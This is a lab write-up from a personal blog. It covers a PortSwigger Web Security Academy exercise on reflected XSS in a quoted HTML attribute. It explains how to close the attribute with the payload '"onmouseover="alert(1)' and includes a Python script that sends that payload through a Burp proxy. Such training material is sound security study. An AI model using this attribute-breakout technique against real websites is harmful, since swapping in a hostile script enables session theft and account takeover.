Shubham Ranpise

Back

XSS Lab 7

Reflected XSS into an attribute where angle brackets are HTML-encoded; inject an event handler to call alert

portswigger-labs content

Reflected XSS into attribute with angle brackets HTML-encoded#

This lab contains a reflected cross-site scripting (XSS) vulnerability in the blog search functionality. The application HTML-encodes angle brackets, which prevents simple <script>-style injections. However, the user-controlled input is reflected inside a quoted HTML attribute. By breaking out of the attribute and injecting an event handler (for example onmouseover), it’s possible to execute JavaScript without needing angle brackets.

The exploit uses a small attribute-injection payload that closes the attribute quote and adds an onmouseover event that calls alert(1). After sending the payload (via an intercepted search request), verify the injection by copying the resulting URL into your browser and moving the mouse over the injected element.

How Exploit Works#

  • The search parameter is reflected inside a quoted attribute in the HTML response.
  • Angle brackets are HTML-encoded, so traditional tag injection (e.g. <img>) fails.
  • By closing the current attribute quote and injecting an event handler, we can cause the browser to execute JavaScript.
  • Payload example: "onmouseover="alert(1) — this closes the attribute, injects an onmouseover handler and keeps the remainder valid HTML.
  • After sending the payload, copy the reflected URL into the browser and move the cursor over the injected element to trigger the alert.

Usage#

python3 exploit.py https://<your-lab-id>.web-security-academy.net
cmd

Exploit#

exploit.py
import requests
import sys
import urllib3

# Disable SSL warnings for Burp Suite
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Set Burp Suite proxy
proxies = {
    'http': 'http://127.0.0.1:8080',
    'https': 'http://127.0.0.1:8080'
}

def check_burp():
    # Check if Burp Suite is running and listening on the configured proxy.

    try:
        requests.get("http://127.0.0.1:8080", timeout=3)
    except requests.exceptions.RequestException:
        print("[-] Burp Suite is not running. Please start it and try again.")
        sys.exit(1)

def exploit_xss(url, payload):
    # Exploit XSS in search parameter.
        uri = f"/?search={payload}"
        res = requests.get(url + uri, verify=False, proxies=proxies)
        res.raise_for_status()
        session = requests.Session()
        res = session.get(url, verify=False, proxies=proxies)
        if "Congratulations" in res.text:
            print("[+] Lab solved 🎉")
            return True
        else:
            print("[-] lab not solved.")

def main():
    # Entry point of the script.

    if len(sys.argv) != 2:
        print(f"Usage: python {sys.argv[0]} <url>")
        print(f"Example: python {sys.argv[0]} https://example.com")
        sys.exit(1)

    url = sys.argv[1].strip()

    # Step 1: Check Burp Suite
    check_burp()

    # Step 2: Define XSS payload
    payload = '"onmouseover="alert(1)'

    # Step 3: Attempt exploitation
    print("[*] Attempting XSS...")
    if exploit_xss(url, payload):
        print("[+] XSS successful!")
    else:
        print("[-] XSS unsuccessful.")

if __name__ == "__main__":
    main()
python

See more portswigger-labs